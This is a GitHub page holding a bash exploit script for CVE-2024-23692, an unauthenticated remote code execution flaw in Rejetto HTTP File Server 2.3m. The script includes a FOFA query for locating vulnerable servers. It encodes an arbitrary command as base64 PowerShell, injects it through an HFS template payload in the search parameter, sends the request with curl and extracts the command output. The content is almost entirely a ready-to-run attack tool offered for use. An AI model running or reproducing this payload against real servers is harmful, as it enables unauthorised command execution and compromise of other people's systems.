-
Notifications
You must be signed in to change notification settings - Fork 15
/
CVE-2024-23692.sh
55 lines (38 loc) · 1.93 KB
/
CVE-2024-23692.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# CVE-2024-23692 Unauthenticated RCE Flaw in Rejetto HTTP File Server
# FOFA "HttpFileServer" && server=="HFS 2.3m"
# Medium https://medium.com/@verylazytech
#!/usr/bin/env bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ _ _ ____ _____ __ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \|___ / / /_ / _ \___ \
| | \ \ / /| _| __) | | | |__) | || |_ __) | |_ \| '_ \ (_) |__) |
| |___ \ V / | |___ / __/| |_| / __/|__ _| / __/ ___) | (_) \__, / __/
\____| \_/ |_____| |_____|\___/_____| |_| |_____|____/ \___/ /_/_____|
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
printf "Usage: $0 <url> <command>"
exit 1
fi
commands=$(echo "echo [S]; $2; echo [S];" | iconv -t UTF-16LE | base64 -w 0)
payload="/?n=%0A&cmd=cmd+/c+powershell+-enc+$commands&search=%25xxx%25url%25:%password%\}\{.exec|\{.?cmd.\}|timeout=15|out=abc.\}\{.?n.\}\{.?n.\}RESULT:\{.?n.\}\{.^abc.\}====\{.?n.\}"
url=$1$payload
printf "\033[0;32mTrying to exploit... Just a sec\033[0m"
response=$(curl -s -X GET "$url")
result=$(echo "$response" | awk 'BEGIN {found=0} /\[S\]/ {if (found == 0) {found=1; next} else {exit}} found {print}')
# Output the result
printf "[\033[0;32m*\033[0m]" $(date "+%Y-%m-%d %H:%M:%S") " \n[\033[0;32m*\033[0m] Output: \n"
printf "$result"
printf "\n"